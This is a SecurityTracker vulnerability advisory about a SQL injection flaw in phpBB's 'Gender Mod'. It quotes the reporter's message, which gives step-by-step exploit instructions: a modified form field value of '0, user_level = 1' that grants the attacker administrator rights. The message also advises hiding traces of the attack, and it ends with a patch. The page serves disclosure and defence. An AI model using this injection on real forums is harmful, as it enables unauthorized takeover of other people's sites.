SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   phpBB Vendors:   phpBB Group
phpBB Bulletin Board 'Gender Mod' Profile Modification Input Validation Flaw Lets Remote Authenticated Users Gain Administrative Privileges on the Bulletin Board
SecurityTracker Alert ID:  1004869
SecurityTracker URL:  http://securitytracker.com/id/1004869
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 28 2002
Impact:   User access via network
Exploit Included:  Yes  
Version(s): 2.x; 1.1.3
Description:   A vulnerability was reported in the phpBB bulletin board software. When used with the 'Gender Mod' modification, a remote authenticated user can gain administrative privileges on the forum.

It is reported that Gender Mod contains an input validation flaw that allows remote authenticated users to inject SQL fields into the UPDATE sql command. A remote user can assign the value 'user_level = 1' to gain administrator privileges on the bulletin board.

The following demonstration exploit steps are provided:

1. Save the User Profile page into your disk to modify it offline.

2. Add the correct full post action address (http://forum.victim.com/...):
<FORM action=http://forum.victim.com/profile.php?sid=<current_session_id> method=post encType=multipart/form-data>

3. Modify the HTML Form so that the input field "gender" has value like:
<input type=text name=gender value="0, user_level = 1 ">

4. Load this page in the same browser window where the cookie is still available.

Then, hit 'Submit' to change the user profile.

The vendor has reportedly been notified.

Impact:   A remote authenticated user can gain administrative access on the bulletin board.
Solution:   No solution was available at the time of this entry.

The author of the report has provided an unofficial patch (available in the Source Message).

Vendor URL:  www.phpbb.com/mods/downloads/index.php?t=sub_pages&cat=6 (Links to External Site)
Cause:   Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  phpBB/gender mod allows get admin privilege, exploit/patch




######################################################################### 
## Annoucement:  
## Sua loi thay doi quyen user trong phpbb2.x
## In phpBB with the official Gender Mod, this vuln allows a normal user
## set her/himself to become a forum administrator.
##
## Nguoi viet/Author: PTTrung
## http://hackervn.net (caothuvolam) http://viethacker.net (langtuhaohoa)
## trungonly@yahoo.com
##
## Description:
## Gender Mod is a commonly used modification in official phpBB releases.
## Unchecked posted values can add some SQL fields into the UPDATE sql 
command. 
## This affects in the newest version 1.1.3.
## If you assign the value: 'user_level = 1', you will have the 
ADMINISTRATOR 
## PRIVILEGE in forum.
##
## Exploit:
## 1. Save the User Profile page into your disk to modify it offline.
## 2. Add the correct full post action address 
(http://forum.victim.com/...):
##   <FORM action=http://forum.victim.com/profile.php?
sid=<current_session_id> method=post 
##      encType=multipart/form-data>
## 3. Modify the HTML Form so that the input field "gender" has value like:
##   <input type=text name=gender value="0, user_level = 1 ">
## 4. Load this page in the same browser window where the cookie is still 
available. 
## Take care all your works to hide the tracking of your hacking and 
finally hit Submit 
## to change user profile. You've done.
##
## Patch:
## File To Patch: 
## forumroot/includes/usercp_register.php
##
## Note.
## The phpBB team has also been emailed about this problem.
## 
######################################################################### 

# Patch
#
#-----[ OPEN ]------------------------------------------ 
# 
    forumroot/includes/usercp_register.php

# 
#-----[ FIND ]------------------------------------------ 
# 

	$gender = ( isset($HTTP_POST_VARS['gender']) ) ? $HTTP_POST_VARS
['gender'] : 0;

# 
#-----[ REPLACE AS ]------------------------------------ 
# 

	$gender = ( isset($HTTP_POST_VARS['gender']) ) ? intval
($HTTP_POST_VARS['gender']) : 0;

# 
#-----[ SAVE/CLOSE/UPLOAD THIS FILE ]------------------- 
# 
# EoP 

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC